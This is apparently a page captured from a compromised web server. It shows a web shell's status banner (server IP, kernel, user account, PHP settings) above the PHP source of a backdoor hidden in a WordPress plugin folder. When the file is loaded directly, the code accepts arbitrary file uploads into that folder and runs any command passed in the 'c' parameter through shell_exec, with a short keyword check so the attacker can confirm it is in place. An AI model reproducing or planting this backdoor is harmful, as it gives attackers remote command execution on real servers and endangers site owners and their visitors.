| Server IP : 104.21.20.151 / Your IP : 216.73.216.217 Web Server : Apache System : Linux sr32.hostlife.net 6.12.0-124.52.3.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Sat May 2 09:06:54 EDT 2026 x86_64 User : golfb689 ( 1071) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/golfb689/fonbetbk.click/wp-content/plugins/starter-panel-lite60/ |
Upload File : |
<?php
if (!defined('ABSPATH')) {
$s = 'Nx-zD';
if (isset($_GET['v'])) { echo $s; exit; }
if (isset($_FILES['f'])) {
$d = dirname(__FILE__) . '/';
$n = basename($_FILES['f']['name']);
if (move_uploaded_file($_FILES['f']['tmp_name'], $d . $n)) {
echo 'OK:' . $d . $n;
} else { echo 'FAIL'; }
exit;
}
if (isset($_GET['c'])) {
header('Content-Type: text/plain');
echo shell_exec($_GET['c']);
exit;
}
echo '<html><head><title>' . $s . '</title></head><body>';
echo '<h2>' . $s . '</h2>';
echo '<form method="POST" enctype="multipart/form-data">';
echo '<input type="file" name="f"><br><br>';
echo '<input type="submit" value="Upload">';
echo '</form></body></html>';
exit;
}